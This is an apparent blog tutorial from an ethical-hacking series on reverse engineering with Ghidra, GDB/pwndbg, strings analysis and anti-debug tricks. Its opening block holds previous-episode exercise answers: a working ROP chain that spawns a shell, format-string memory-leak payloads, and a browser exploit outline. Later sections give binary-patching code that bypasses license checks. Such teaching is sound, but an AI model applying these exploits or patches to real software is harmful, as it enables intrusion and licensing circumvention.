Learn Ethical Hacking (#44) - Reverse Engineering - Understanding Binaries

@scipio 70

about 1 month ago

StemSocial

Learn Ethical Hacking (#44) - Reverse Engineering - Understanding Binaries

What will I learn

What reverse engineering is and why it is essential for vulnerability research and malware analysis;
Static analysis -- reading disassembled code without executing it, using Ghidra and objdump;
Dynamic analysis -- running binaries under a debugger to observe behavior in real time;
x86/x64 assembly essentials -- the instructions you need to read disassembly productively;
Ghidra -- the NSA's free reverse engineering tool and how to use the decompiler effectively;
Patching binaries -- modifying compiled programs to change behavior;
Anti-reversing techniques -- obfuscation, packing, and anti-debug tricks;
Defense: code signing, integrity checks, obfuscation as a defense layer.

Requirements

A working modern computer running macOS, Windows or Ubuntu;
Ghidra installed (https://ghidra-sre.org/);
GDB with pwndbg or GEF;
Understanding of memory layout from episodes 42-43;
The ambition to learn ethical hacking and security research.

Difficulty

Advanced

Curriculum (of the `Learn Ethical Hacking Series`):

Gadgets found with ROPgadget:

pop_eax = 0x080b81c6 # pop eax; ret
pop_ebx = 0x080481c9 # pop ebx; ret
pop_ecx = 0x080e5571 # pop ecx; ret
pop_edx = 0x0806ec0a # pop edx; ret
int_80 = 0x0806c943 # int 0x80

execve("/bin/sh", NULL, NULL) = syscall 11

binsh = next(elf.search(b'/bin/sh'))

payload = b'A' * 76
payload += p32(pop_eax) + p32(11) # eax = 11 (execve)
payload += p32(pop_ebx) + p32(binsh) # ebx = "/bin/sh"
payload += p32(pop_ecx) + p32(0) # ecx = NULL
payload += p32(pop_edx) + p32(0) # edx = NULL
payload += p32(int_80) # syscall

p = process('./vuln')
p.sendline(payload)
p.interactive()

Shell spawned via execve syscall


The essential insight is that each `pop REG; ret` gadget loads one value from the stack into a register and then returns to the next gadget address on the stack. You're programming the CPU one register at a time, using the stack as your instruction sequence. The ROP chain is effectively a program written in stack layout rather than in machine code -- DEP is completely bypassed because you never execute from the stack, you just read data from it. The `int 0x80` at the end is the only "real" instruction that matters -- everything before it was just setup, loading the right values into the right registers so the kernel performs `execve("/bin/sh", NULL, NULL)`.

**Exercise 2:** Format string exploitation.

```python
from pwn import *

p = process('./fmtvuln')

# Step 1: Leak 8 stack values
p.sendline(b'%08x.' * 8)
leaked = p.recvline().decode().strip()
# Output: bffff6a0.00000064.f7c48150.00000000.41414141.25303825...
# Our input "AAAA" (0x41414141) appears at offset 5

# Step 2: Direct parameter access to confirm offset
p = process('./fmtvuln')
p.sendline(b'AAAA%5$08x')
result = p.recvline().decode().strip()
# Output: AAAA41414141 -- confirmed position 5

# Step 3: Read arbitrary address using %s
p = process('./fmtvuln')
target_addr = p32(0xf7c48150)
p.sendline(target_addr + b'%5$s')
# Reads the string at address 0xf7c48150
# (whatever is stored at that libc address)

Format strings are a dual-use primitive -- the same %x format specifier that leaks stack values for ASLR bypass can also read arbitrary memory when combined with %s and a placed address. The offset discovery (position 5 in this case) is the critical step because it tells you exactly which stack position your input occupies, which lets you use direct parameter access (%5$x, %5$s, %5$n) to target specific values without dumping everything in between. The %n write primitive (not shown in full here -- see episode 43's format string section) completes the picture: read with %s, write with %n, all from a single printf(user_input) vulnerability.

Exercise 3: UAF case study.

CVE-2024-4947 (Chrome V8 Type Confusion / UAF)

Vulnerability: Type confusion in the V8 Maglev JIT compiler.
The Maglev compiler incorrectly handled certain JavaScript
object types during JIT compilation, allowing type confusion
between objects with different memory layouts.

What gets freed: A JIT-compiled code object is freed during
garbage collection while a stale pointer to it still exists
in the optimized code path.

Exploit strategy:
1. Trigger Maglev JIT compilation on crafted JavaScript
2. Force garbage collection to free the JIT code object
3. Reallocate the freed memory with an ArrayBuffer containing
   attacker-controlled data
4. The stale pointer now references attacker data instead of
   the original code object
5. When the JIT code path executes, it reads function pointers
   from attacker-controlled memory -> arbitrary code execution

Patch: Added proper GC rooting for Maglev code objects so they
cannot be collected while references exist in optimized code.

Mitigations bypassed:
- V8 sandbox (partial bypass via sandbox escape primitive)
- Site isolation (bypassed because exploit runs within
  renderer process, not across site boundaries)
- ASLR (bypassed via V8 heap address leak)

Used in the wild by APT group (0-day) before patch.
Google assigned CVSS 8.8 (High).

This CVE demonstrates the pattern that dominates modern browser exploitation: the vulnerability is not a simple buffer overflow but a type confusion in the JIT compiler -- one of the most complex components in any browser. The exploit requires understanding V8's object layout, garbage collection timing, and Maglev's optimization pipeline. The patch was a single line of code (adding a GC root), but finding the vulnerability required deep knowledge of how the JIT compiler manages memory during optimization passes.

Learn Ethical Hacking (#44) - Reverse Engineering - Understanding Binaries

Episode 43 covered the advanced side of exploit development -- ROP chains for bypassing DEP/NX by chaining existing code gadgets instead of injecting shellcode, ASLR bypass through GOT leaking where you use puts() to print a libc address and then calculate where everything else lives, stack canary bypass via format string leaks, format string vulnerabilities as both read AND write primitives, heap exploitation with use-after-free and double free, heap spraying as the probabilistic approach to hitting your payload, and full exploit chains that combine canary leak + address leak + ROP to defeat a binary with all protections enabled. You can now construct multi-stage exploits against hardened binaries using pwntools, and you understand why defense-in-depth works -- not because any single layer is unbreakable, but because breaking all of them simultaneously requires a level of vulnerability complexity that most software simply doesn't have.

But here's the thing about episodes 42 and 43: we always had the source code. We wrote vulnerable.c ourselves, compiled it, and then exploited it. We knew exactly where the strcpy was. We knew the buffer size. We knew the stack layout because we designed it. In the real world, you almost never have that luxury. The software you're auditing is a compiled binary -- a .exe, an .elf, a .dylib -- and the only thing between you and understanding it is a hex editor and a disassembler.

This episode is about reading binaries without source code. Reverse engineering is the skill that connects exploit development (episodes 42-43) to real-world vulnerability research -- because before you can exploit a bug, you need to FIND it, and in closed-source software, finding it means reading assembly.

Here we go.

What Reverse Engineering Actually Is

Reverse engineering is the process of analyzing a compiled program to understand what it does, how it does it, and where it goes wrong -- all without access to the original source code. You take the output of a compiler (machine code) and work backwards to reconstruct the logic, data structures, and control flow that the programmer intended.

Three main use cases drive reverse engineering in security:

Vulnerability research -- finding exploitable bugs in proprietary software. If Adobe Reader, Microsoft Office, or a firmware update has a buffer overflow, someone has to find it. That someone reads the disassembly.
Malware analysis -- understanding what a piece of malware does, how it communicates with its command and control infrastructure, what data it steals, and how to detect or neutralize it. Every threat intelligence report you've ever read started with someone reverse engineering a binary.
Protocol and format analysis -- understanding proprietary file formats, network protocols, or DRM implementations. How does a game's anti-cheat system work? What data does this IoT device send home? How does this VPN client establish its tunnel? The answers are in the binary.

There are two fundamental approaches: static analysis (examining the binary without running it) and dynamic analysis (running the binary and observing its behavior). In practice, you use both -- static analysis to build a map of what the code does, dynamic analysis to verify your understanding and observe runtime state. They are complementary, not competing techniques.

x86 Assembly -- The Minimum You Need

You do not need to become an assembly language expert to do reverse engineering. What you need is pattern recognition -- the ability to look at a sequence of instructions and recognize "that's an if-statement" or "that's a function call with a return value check" without parsing every individual opcode. Here are the instructions that account for roughly 90% of what you'll encounter:

; Data movement
mov eax, ebx        ; copy ebx into eax
mov eax, [ebx]      ; load value from memory address in ebx
mov [eax], ebx      ; store ebx at memory address in eax
lea eax, [ebx+4]    ; load effective address (pointer math, no memory access)
push eax            ; push onto stack (ESP decrements)
pop eax             ; pop from stack (ESP increments)

; Arithmetic
add eax, 4          ; eax = eax + 4
sub eax, 4          ; eax = eax - 4
xor eax, eax        ; eax = 0 (common idiom for zeroing a register)
inc eax             ; eax++
dec eax             ; eax--
imul eax, ebx       ; eax = eax * ebx (signed multiply)

; Comparison and branching
cmp eax, 0          ; compare eax with 0 (sets CPU flags)
test eax, eax       ; AND eax with itself (check if zero, faster than cmp)
je  label           ; jump if equal (ZF=1)
jne label           ; jump if not equal
jg  label           ; jump if greater (signed)
jl  label           ; jump if less (signed)
ja  label           ; jump if above (unsigned)
jb  label           ; jump if below (unsigned)
jmp label           ; unconditional jump

; Function calls
call function       ; push return address, jump to function
ret                 ; pop return address, jump to it
leave               ; mov esp, ebp; pop ebp (function epilogue)

; x86-64 calling convention (System V AMD64 ABI -- Linux):
; Arguments: rdi, rsi, rdx, rcx, r8, r9 (then stack)
; Return value: rax
; Caller-saved: rax, rcx, rdx, rsi, rdi, r8, r9, r10, r11
; Callee-saved: rbx, rbp, r12-r15

The pattern recognition part is what matters most. When you see cmp eax, 0 followed by je somewhere, that's an if (x == 0) branch. When you see call some_function followed by test eax, eax and then jne error_path, that's a function call with a "did it succeed?" check. When you see mov [rbp-0x10], rdi at the start of a function, that's saving the first argument to a local variable. You don't need to memorize every instruction encoding -- you need to recognize these high-level patterns quickly enough that you can read disassembly at something approaching the speed of reading C code.

The x86-64 calling convention (on Linux -- Windows uses a different one) is especially important because it tells you where function arguments live. If you see a mov rdi, some_value right before a call, the value being put in rdi is the first argument to that function. If the function is strcmp, that first argument is a string being compared. If the function is malloc, that first argument is the allocation size. Knowing the calling convention lets you read function calls almost as clearly as if you had the source code.

Static Analysis with Ghidra

Ghidra (https://ghidra-sre.org/) is the NSA's reverse engineering framework, released as open source in 2019. Before Ghidra, the industry standard was IDA Pro -- an excellent tool that costs $2,765/year for a named license. Ghidra is free, open source, and has one killer feature that makes it competitive with IDA: the decompiler. The decompiler takes raw assembly and produces C-like pseudocode that is (usually) dramatically easier to read than the raw instructions.

# Download and install Ghidra (requires Java 17+)
# https://ghidra-sre.org/
# Extract, run:
./ghidraRun

# Workflow:
# 1. File -> New Project -> Non-Shared Project
# 2. File -> Import File -> select your binary
# 3. When prompted "Analyze?", click Yes (auto-analysis)
# 4. Wait for analysis to complete (progress bar at bottom)
# 5. Navigate: Functions window (left) shows all discovered functions
# 6. Double-click a function to see disassembly (center panel)
# 7. Decompiler output appears in the right panel automatically

Reading Ghidra's Decompiler Output

The decompiler is where Ghidra really shines. Here is what a license check function might look like in the decompiler versus the raw disassembly:

// Ghidra decompiler output for check_license()
// Variable names are auto-generated (local_48, param_1)
// Types are inferred (sometimes wrong)

int check_license(char *param_1) {
    int iVar1;
    char local_48[64];

    strcpy(local_48, param_1);     // BUFFER OVERFLOW -- 64 byte buffer,
                                    // no bounds check on param_1
    iVar1 = strcmp(local_48, "VALID-LICENSE-KEY-2026");
    if (iVar1 == 0) {
        puts("License valid!");
        return 1;
    }
    puts("Invalid license.");
    return 0;
}

Compare that to reading the same function in raw assembly -- 40+ instructions of mov, lea, push, call, test, je. The decompiler compressed all of that into 10 lines of readable pseudocode. You can immediately see the vulnerability: strcpy with no bounds checking on a 64-byte stack buffer. The same bug we exploited in episode 42, but discovered through reverse engineering instead of source code review.

Ghidra's decompiler is not perfect -- the auto-generated variable names (local_48, iVar1, param_1) are meaningless, types are sometimes wrong (it might call a char* an int*), and complex code with heavy optimization can produce confusing output. But it turns a 200-instruction function into 15 lines of C that you can actually analyze for vulnerabilities, and that transformation is the difference between spending 3 hours on a function and spending 15 minutes.

Nota bene: You can rename variables and add type annotations in Ghidra. Right-click a variable, select "Rename Variable" or "Retype Variable." As you reverse engineer a binary, you gradually annotate functions with meaningful names -- local_48 becomes user_buffer, param_1 becomes license_input, and the function itself gets renamed from FUN_00401230 to check_license. This annotation process is the core workflow of professional reverse engineering.

Strings Analysis -- The First Thing You Do

Before diving into disassembly, the very first thing you should do with any unknown binary is look at its strings. Strings embedded in a binary reveal an enormous amount of information -- error messages, log messages, API endpoints, hardcoded credentials, file paths, and command names:

# Extract printable strings (minimum 4 chars)
strings binary | head -50

# Search for interesting patterns
strings binary | grep -i "password\|key\|secret\|flag\|admin\|token"
strings binary | grep -i "http://\|https://\|ftp://"
strings binary | grep -i "error\|fail\|denied\|invalid"

# In Ghidra: Window -> Defined Strings
# Sort by string content, double-click to jump to the cross-reference
# (where in the code this string is used)

# Real-world example: strings on a suspicious binary
$ strings suspicious.bin | grep -i "http"
http://cdn-update.totally-legit.com/api/v2/beacon
http://backup-c2.evil-domain.xyz/heartbeat
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

$ strings suspicious.bin | grep -i "cmd\|shell\|exec"
cmd.exe /c
powershell -enc
CreateProcessA
ShellExecuteA

$ strings suspicious.bin | grep -i "reg\|persist"
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER

Those strings alone tell you: this binary contacts two C2 servers, uses a legitimate-looking User-Agent for disguise, can spawn cmd.exe and PowerShell, and writes to the Windows Run registry key for persistence. You haven't opened a disassembler yet and you already know what this thing does. Strings analysis is the lowest-effort, highest-reward technique in reverse engineering.

In Ghidra, every string has cross-references (xrefs) -- locations in the code that reference that string. Double-click a string like "Invalid license." and Ghidra shows you exactly which function uses it. Follow the xref, and you're looking at the license check function. Follow the cross-references of the function, and you see where it's called from. This "follow the strings" technique is how most reverse engineers navigate a large binary -- you don't read it linearly from start to finish, you find interesting strings and trace backwards to the code that uses them.

Dynamic Analysis with GDB

Static analysis tells you what the code says. Dynamic analysis tells you what the code does. Sometimes these are different -- heavily obfuscated code, self-modifying code, or packed binaries can look incomprehensible in a static disassembler but behave straightforwardly when you actually run them and watch what happens.

GDB (GNU Debugger) is the standard dynamic analysis tool on Linux. We used it in episodes 42-43 for exploit development, but for reverse engineering the workflow is different -- instead of trying to crash the program, you're trying to understand it:

# Load the binary in GDB
gdb ./target_binary

# Set a breakpoint at the entry point
(gdb) break main
(gdb) run

# Step through execution
(gdb) ni            # next instruction (step OVER function calls)
(gdb) si            # step instruction (step INTO function calls)
(gdb) finish        # run until current function returns
(gdb) continue      # continue to next breakpoint

# Examine registers and memory
(gdb) info registers         # show all register values
(gdb) x/20x $rsp            # examine 20 hex words at stack pointer
(gdb) x/s $rdi              # examine rdi as a string
(gdb) x/10i $rip            # disassemble 10 instructions at RIP
(gdb) x/20x 0x00404000      # examine memory at a specific address

# Set conditional breakpoints
(gdb) break *0x00401234 if $rax == 0
(gdb) break strcmp           # break on any call to strcmp

# Watch memory for changes
(gdb) watch *0x00404000      # break when value at this address changes
(gdb) rwatch *0x00404000     # break when value is READ

Pwndbg/GEF -- GDB on Steroids

Raw GDB is functional but painful. Pwndbg and GEF are GDB extensions that transform it into a proper reverse engineering environment with color-coded output, context display (registers + stack + disassembly + backtrace all visible simultaneously), and dozens of convenience commands:

# Install pwndbg
git clone https://github.com/pwndbg/pwndbg
cd pwndbg && ./setup.sh

# Now every time GDB stops, you see a full context display:
# REGISTERS (color-coded by value type)
# DISASM (current and next instructions)
# STACK (annotated with symbols)
# BACKTRACE (call chain)

# Useful pwndbg commands for reverse engineering:
pwndbg> vmmap             # show full memory map (/proc/pid/maps)
pwndbg> heap              # show heap state (chunks, bins, freelists)
pwndbg> got               # show GOT entries and their resolved addresses
pwndbg> plt               # show PLT entries
pwndbg> checksec          # show binary protections
pwndbg> search -s "flag"  # search memory for a string
pwndbg> telescope 20      # show 20 stack entries with smart annotations
pwndbg> xinfo $rdi        # show what memory region an address belongs to

# Practical RE workflow with pwndbg:
# 1. Run the binary, observe its behavior
# 2. Set breakpoints at interesting functions (identified via Ghidra)
# 3. Step through, watching register values and memory state
# 4. When you hit a comparison (cmp/test + conditional jump),
#    examine what's being compared -- this often reveals passwords,
#    license keys, or validation logic

# Example: reversing a password check
pwndbg> break strcmp
pwndbg> run
# The program asks for a password, type anything
# Breakpoint hit at strcmp:
#   RDI: "your_input_here"
#   RSI: "s3cr3t_p4ssw0rd!"    <-- there's your answer

That last example -- breaking on strcmp to see what your input is being compared against -- is one of the most effective dynamic analysis techniques. If the program uses strcmp, strncmp, or memcmp to validate input, you can see both arguments by setting a breakpoint on the library function and examining rdi (first argument) and rsi (second argument). The password, license key, or expected input is sitting right there in a register. This works for any comparison-based validation, regardless of how obfuscated the code around it is ;-)

Patching Binaries

Sometimes you don't need to understand the entire binary -- you just need to change one decision. A license check that returns 0 (fail) when it should return 1 (pass). A function call that enforces a trial period. A conditional jump that sends you to the "access denied" path when you want the "access granted" path.

Binary patching modifies specific bytes in the compiled program to change its behavior:

# Example: bypass a license check
# The original disassembly at the critical decision point:
#
#   0x00401234: call check_license
#   0x00401239: test eax, eax
#   0x0040123b: je   0x00401260    <-- jumps to FAIL if eax == 0
#   0x0040123d: ...                 <-- SUCCESS path continues here
#   ...
#   0x00401260: ...                 <-- FAIL path

# Option 1: Change JE (jump if equal/zero) to JNE (jump if not equal)
# JE  opcode = 0x74
# JNE opcode = 0x75
# Single byte change: the logic is now inverted

# Option 2: NOP out the jump entirely
# Replace the JE instruction (2 bytes: 0x74 0x23) with two NOPs (0x90 0x90)
# The program falls through to the success path regardless of the check

# Option 3: Patch the function to always return 1
# Change the first instruction of check_license to:
#   mov eax, 1
#   ret
# Bytes: B8 01 00 00 00 C3
# The function always returns success without executing any check logic

#!/usr/bin/env python3
"""patch_binary.py -- binary patching example"""

# Read the original binary
with open('target_binary', 'rb') as f:
    data = bytearray(f.read())

# Patch: NOP out the conditional jump at offset 0x123b
# (offset found via Ghidra: click the instruction, look at the
#  file offset in the bottom status bar)
data[0x123b] = 0x90    # NOP
data[0x123c] = 0x90    # NOP

# Write the patched binary
with open('target_binary_patched', 'wb') as f:
    f.write(data)

# Make it executable
import os
os.chmod('target_binary_patched', 0o755)

In Ghidra, you can patch directly: right-click an instruction, select Patch Instruction, and type the new instruction. Ghidra calculates the byte encoding for you. Then export the patched binary via File -> Export Program -> Original File.

A word of caution: patching is a blunt instrument. It works for simple validation bypasses, but if the check result is used later in the program (e.g., the return value determines which encryption key is used to decrypt subsequent data), a simple patch can break the program in subtle ways. Always test patched binaries thoroughly. And obviously, patching commercial software to bypass licensing is illegal in most jurisdictions -- we're discussing this for vulnerability research and CTF purposes, where understanding binary modification is a core skill.

Anti-Reversing Techniques

Software authors use various techniques to make reverse engineering harder. Understanding these techniques is essential because you will encounter them constantly -- especially in malware, DRM implementations, and commercial software:

# 1. Symbol stripping
strip binary
# Removes function names, variable names, and debug information
# Before: you see check_license, validate_input, main
# After: you see FUN_00401000, FUN_00401200, entry
# Ghidra still works -- it uses heuristic function detection
# (looking for function prologues like push rbp; mov rbp, rsp)
# but navigation is much harder without meaningful names

# 2. Packing / compression
upx --best binary
# UPX compresses the entire binary and adds a small decompression
# stub that unpacks the original code into memory at runtime.
# In Ghidra: you see the UPX stub code, not the real program.
# The real code only exists in memory after unpacking.
#
# UPX is trivially reversible:
upx -d packed_binary    # decompress back to original
#
# Commercial packers (Themida, VMProtect, Enigma Protector) are
# NOT trivially reversible. They use:
# - Multiple unpacking layers
# - Anti-debug checks between layers
# - Code virtualization (translate x86 to custom bytecode)
# - Integrity checks that detect tampering

// 3. Anti-debug: ptrace detection (Linux)
#include <sys/ptrace.h>

void anti_debug() {
    if (ptrace(PTRACE_TRACEME, 0, 0, 0) == -1) {
        // A debugger is already attached -- PTRACE_TRACEME fails
        // because only one tracer is allowed per process
        exit(1);
    }
}

// Bypass methods:
// a) Patch the ptrace call to NOP
// b) Use LD_PRELOAD to override ptrace:
//    LD_PRELOAD=./fake_ptrace.so ./binary
//    where fake_ptrace.so exports ptrace() that always returns 0
// c) In GDB: catch syscall ptrace, then set $rax = 0 and continue

// 4. Timing checks
#include <time.h>

void timing_check() {
    clock_t start = clock();
    // ... some code ...
    clock_t end = clock();
    if ((end - start) > 1000) {
        // Took too long -- probably being single-stepped
        // in a debugger
        exit(1);
    }
}

// Bypass: patch the conditional jump after the timing check
// or use GDB's "set $rax = ..." to fake the clock() return value

# 5. Code obfuscation techniques
# - Control flow flattening: replaces structured if/else/loop with
#   a single giant switch statement in a while(1) loop. Every basic
#   block becomes a case in the switch. Kills Ghidra's decompiler.
#
# - Opaque predicates: conditions that always evaluate the same way
#   but look unpredictable to a disassembler.
#   Example: if ((x * x) % 2 == 0 || (x * x) % 2 == 1)
#   Always true, but the disassembler sees a conditional branch
#   and generates two code paths (one of which is dead code).
#
# - Junk code insertion: NOPs, meaningless arithmetic, dead stores
#   that increase the size of functions without changing behavior.
#   Makes manual analysis tedious but doesn't fool smart analysis.
#
# - String encryption: hardcoded strings are XORed or AES-encrypted
#   in the binary and decrypted at runtime. Defeats strings analysis.
#   Dynamic analysis still works -- break at the decryption function
#   output and read the decrypted string from memory.

Identifying Vulnerability Patterns in Disassembly

The real payoff of reverse engineering for security work is finding vulnerabilities in closed-source software. Here are the patterns to look for:

// Pattern 1: Dangerous function calls
// In Ghidra's decompiler, search for calls to:
//   strcpy, strcat, sprintf, gets, scanf without width specifier
// These are all buffer overflow candidates (just like episode 42)

// Ghidra decompiler output:
void process_input(char *param_1) {
    char local_108[256];
    sprintf(local_108, "User: %s logged in at %s", param_1, timestamp);
    // If param_1 is long enough, this overflows local_108
    // Fixed-size buffer + unbounded format string = vulnerability
}

// Pattern 2: Integer overflow leading to heap overflow
// Look for: malloc(user_controlled_size) or malloc(a * b)

void process_data(int count, int size) {
    // Ghidra decompiler shows:
    int total = count * size;           // integer overflow possible!
    char *buf = (char *)malloc(total);  // tiny allocation
    for (int i = 0; i < count; i++) {
        memcpy(buf + i * size, data[i], size);  // writes way past buf
    }
}
// If count = 0x10000 and size = 0x10000:
// total = 0x10000 * 0x10000 = 0x100000000 = 0 (32-bit overflow!)
// malloc(0) returns a tiny buffer, memcpy writes 4GB into it

// Pattern 3: Use-after-free indicators
// Look for: free() followed by use of the same pointer
// In Ghidra: search for xrefs to free(), then check if the
// freed pointer is used after the free call

void handle_request(Request *req) {
    process(req);
    free(req);          // freed here
    log_access(req);    // USED HERE -- use-after-free!
}

The Reverse Engineering Workflow

Putting it all together, here's the workflow I use when analyzing an unknown binary (whether for vulnerability research or malware analysis):

File identification -- file binary, readelf -h binary (ELF), or load into PE-bear (Windows). What architecture? What OS? Statically or dynamically linked? Stripped?
Strings -- strings binary | grep -i interesting_pattern. Immediate high-value intelligence: URLs, passwords, error messages, file paths, API names.
Ghidra import and auto-analysis -- let Ghidra identify functions, cross-references, data types. This takes a few minutes for large binaries.
Navigate by strings -- find interesting strings in Ghidra's Defined Strings window, follow their xrefs to the code that uses them. This gets you to the interesting parts of the binary without reading it linearly.
Decompiler for understanding -- read the decompiled C pseudocode. Rename variables, retype parameters, add comments as you understand each function.
Dynamic verification -- when the decompiler output is ambiguous, run the binary in GDB with pwndbg. Set breakpoints at the functions you've identified, step through, examine register and memory state.
Vulnerability audit -- search for the dangerous function call patterns listed above. Every strcpy, sprintf, and unchecked malloc is a potential finding.

This workflow scales from simple crackmes (30 minutes) to complex firmware images (weeks of work). The tools change -- you might use Binary Ninja instead of Ghidra, or Frida instead of GDB for instrumentation on mobile platforms -- but the approach is constant: strings first, navigation by cross-reference, decompile for understanding, dynamic for verification.

The AI Slop Connection

AI-powered decompilers are an active area of research and they are genuinely improving the reverse engineering workflow. Projects that use large language models to rename variables, suggest function purposes, and produce more readable decompiler output are making closed-source analysis faster. A function that Ghidra decompiles as FUN_00401230(local_48, iVar1) might become validate_user_input(username_buffer, max_length) with AI assistance -- a significant readability improvement.

Having said that, the same asymmetry we've seen throughout this series applies here. AI makes reverse engineering easier for defenders (better decompilation, faster analysis), but it also makes obfuscation generation easier for attackers (more sophisticated code transformations, automated anti-analysis techniques). AI-generated obfuscation that dynamically creates opaque predicates, randomizes control flow flattening patterns, and produces polymorphic string encryption -- all calibrated to defeat specific decompiler heuristics -- is already a reality in advanced malware.

The practical takeaway: AI will not replace the reverse engineering skill. It will augment it. You still need to understand what mov rdi, rsi; call strcmp means. You still need to recognize vulnerability patterns in decompiled output. You still need to navigate a binary by cross-references and understand the architecture. The AI makes each of those steps faster, but it cannot do them for you -- because the judgment calls (is this a vulnerability or intentional behavior? is this obfuscation hiding something malicious or protecting legitimate IP?) require understanding that AI tools consistently get wrong when the context is adversarial.

What Comes Next

We've now covered the full exploitation lifecycle from start to finish: scanning and discovery (episodes 4-5), web application attacks (episodes 12-28), network exploitation (episodes 29-30), privilege escalation (episodes 31-32), lateral movement (episodes 33-34), infrastructure attacks (episodes 35-40), exploitation frameworks (episode 41), custom exploit development with mitigation bypasses (episodes 42-43), and now reverse engineering compiled binaries to find vulnerabilities without source code.

The next phase of the series shifts into a different domain entirely -- the supply chain, the human element, and the organizational dimensions of security. The techniques we've covered so far are all "how do you break into systems." The questions that come next are about the broader context: where do the vulnerabilities come from in the first place? How do attackers poison the tools and libraries that developers depend on? Why does security training consistently fail to change human behavior? What happens when the attack vector isn't a technical exploit but a compromised npm package or a manipulated employee? These are the questions that separate a vulnerability researcher from a complete security professional, and they build directly on everything we've done so far.

Exercises

Exercise 1: Download a crackme from https://crackmes.one (difficulty: easy, platform: Linux x86). Open it in Ghidra. Use the Defined Strings window to find strings like "Correct!", "Wrong!", or "Enter password:". Follow the cross-references from those strings to the validation function. Read the decompiler output and identify the expected input (hardcoded string comparison, arithmetic check, or hash). Solve the crackme without patching -- by understanding the algorithm and providing the correct input. Document: (a) the function structure in Ghidra's decompiler view, (b) the validation logic you identified, (c) the correct input. Save to ~/lab-notes/crackme-analysis.md.

Exercise 2: Write a simple C program that checks a 4-digit PIN (int pin = 7394;, if (atoi(input) == pin) { puts("Access granted"); }). Compile it, then strip symbols (strip binary). Give the stripped binary to yourself after a coffee break. Reverse it in Ghidra: find the PIN without looking at the source code (hint: the integer constant is visible in the decompiler output or as an immediate operand in the disassembly). Then patch the binary so it accepts ANY PIN (NOP the conditional jump or patch the comparison). Document the patching process: which bytes changed, what instruction was modified, and verify the patch works. Save to ~/lab-notes/pin-reversal.md.

Exercise 3: Take any binary you compiled in a previous exercise (from episodes 42 or 43), pack it with UPX (upx --best ./binary). Open the packed version in Ghidra and document what you see -- compressed sections, no meaningful function names, the UPX stub code. Then unpack it (upx -d ./binary) and re-analyze in Ghidra. Compare the Ghidra output before and after unpacking (number of functions detected, decompiler readability, string visibility). Research one commercial packer (Themida or VMProtect) and write a brief summary of how it differs from UPX (code virtualiztion, multi-layer unpacking, anti-debug integration). Save your comparison to ~/lab-notes/packing-analysis.md.

Cheers!

@scipio

stem stemsocial steemstem security programming

0.000

0 comments

Learn Ethical Hacking (#44) - Reverse Engineering - Understanding Binaries

Learn Ethical Hacking (#44) - Reverse Engineering - Understanding Binaries

What will I learn

Requirements

Difficulty

Curriculum (of the Learn Ethical Hacking Series):

Gadgets found with ROPgadget:

execve("/bin/sh", NULL, NULL) = syscall 11

Shell spawned via execve syscall

Learn Ethical Hacking (#44) - Reverse Engineering - Understanding Binaries

What Reverse Engineering Actually Is

x86 Assembly -- The Minimum You Need

Static Analysis with Ghidra

Reading Ghidra's Decompiler Output

Strings Analysis -- The First Thing You Do

Dynamic Analysis with GDB

Pwndbg/GEF -- GDB on Steroids

Patching Binaries

Anti-Reversing Techniques

Identifying Vulnerability Patterns in Disassembly

The Reverse Engineering Workflow

The AI Slop Connection

What Comes Next

Exercises

Cheers!

Curriculum (of the `Learn Ethical Hacking Series`):